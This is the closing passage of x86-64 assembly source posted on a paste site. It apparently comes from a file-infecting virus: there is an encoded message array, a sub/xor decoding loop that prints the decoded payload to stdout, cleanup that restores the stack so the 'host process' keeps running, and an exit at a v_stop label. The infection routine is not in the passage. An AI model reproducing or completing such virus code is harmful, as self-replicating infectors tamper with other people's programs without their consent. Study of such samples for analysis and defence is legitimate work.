  506.             db 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x55
  507.             db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  508.             db 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
  509.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  510.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  511.             db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
  512.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
  513.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  514.             db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  515.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  516.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  517.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  518.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
  519.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  520.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  521.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  522.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  523.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  524.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
  525.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  526.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  527.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  528.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  529.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  530.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
  531.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  532.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  533.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  534.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  535.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  536.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
  537.             db 0x41
  538.             len = $-msg
  539.  
  540.         payload:
  541.             pop rsi                                             ; setting up decoding loop
  542.             mov rcx, len
  543.             lea rdi, [r15 + 3001]
  544.  
  545.             .decode:
  546.                 lodsb                                           ; load byte from rsi into al
  547.                 sub  al, 50                                     ; decoding it
  548.                 xor  al, 5
  549.                 stosb                                           ; store byte from al into rdi
  550.                 loop .decode                                    ; sub 1 from rcx and continue loop until rcx = 0
  551.  
  552.             lea rsi, [r15 + 3001]                               ; decoded payload is at [r15 + 3000]
  553.             mov rax, SYS_WRITE
  554.             mov rdi, STDOUT                                     ; display payload
  555.             mov rdx, len
  556.             syscall
  557.  
  558. cleanup:
  559.     add rsp, 5000                                               ; restoring stack so host process can run normally, this also could use some improvement
  560.     pop rsp
  561.     pop rdx
  562.  
  563. v_stop:
  564.     xor rdi, rdi                                                ; exit code 0
  565.     mov rax, SYS_EXIT
  566.     syscall
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement